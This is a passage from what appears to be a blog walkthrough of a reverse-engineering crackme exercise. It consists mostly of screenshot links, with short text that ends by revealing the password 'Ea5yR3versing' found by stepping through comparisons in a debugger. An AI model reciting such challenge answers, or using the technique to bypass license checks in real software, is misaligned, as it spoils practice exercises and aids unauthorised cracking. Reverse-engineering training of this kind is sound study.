href="https://res.cloudinary.com/practicaldev/image/fetch/s--z7aEEqMO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/re91twgp9pqqefmwwe1n.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--z7aEEqMO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/re91twgp9pqqefmwwe1n.png" alt="Image description" width="343" height="244"></a> <br> Stepping through the comparisons, we can quickly see that there shouldn't be a space between "Ea5y" and "R3versing".<br> 'R' is compared with our input ' ', which means we probably need to remove the space.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--K5GGYMGs--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9slbnkg4b0wu7oighchk.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--K5GGYMGs--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9slbnkg4b0wu7oighchk.png" alt="Image description" width="80" height="16"></a><br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--l-C-uKC_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kbhyrdnjyly4ci7exugj.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--l-C-uKC_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kbhyrdnjyly4ci7exugj.png" alt="Image description" width="174" height="27"></a><br> Therefore, we input 'Ea5yR3versing' and hit the button one last time.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QJW8YzJx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/maywwo4jyoo94gyxl21h.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QJW8YzJx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/maywwo4jyoo94gyxl21h.png" alt="Image description" width="342" height="244"></a></p> security cybersecurity reverseengineering cracking